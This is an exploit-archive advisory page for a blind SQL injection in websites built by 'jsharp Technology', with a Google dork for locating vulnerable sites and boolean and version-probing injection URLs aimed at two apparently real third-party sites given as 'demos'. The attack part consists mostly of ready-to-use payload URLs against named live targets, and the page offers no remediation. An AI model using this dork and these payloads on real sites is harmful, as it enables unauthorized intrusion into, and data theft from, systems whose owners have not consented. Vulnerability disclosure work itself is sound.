jsharp Technology - Blind Sql Injection

2023.12.27

behrouz mansoori (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: "Designed and Developed by jsharp Technology"

*********************************************************
#Exploit Title: jsharp Technology - Blind Sql Injection
#Date: 2023-12-27
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed and Developed by jsharp Technology"
#Category:webapps
#Tested On: Mac, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://fatehpurnp.in/een/page.php?id=40%27%20and%20true--+
* https://fatehpurnp.in/een/page.php?id=40%27%20and%20false--+
* https://fatehpurnp.in/een/page.php?id=40%27%20and%20substring(@@version,1,1)=1--+
### Demo 2:
* https://nppraebareli.in/een/page.php?id=5%27%20and%20true--+
* https://nppraebareli.in/een/page.php?id=5%27%20and%20false--+
* https://nppraebareli.in/een/page.php?id=5%27%20and%20substring(@@version,1,1)=1--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

jsharp Technology - Blind Sql Injection

Dork: "Designed and Developed by jsharp Technology"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.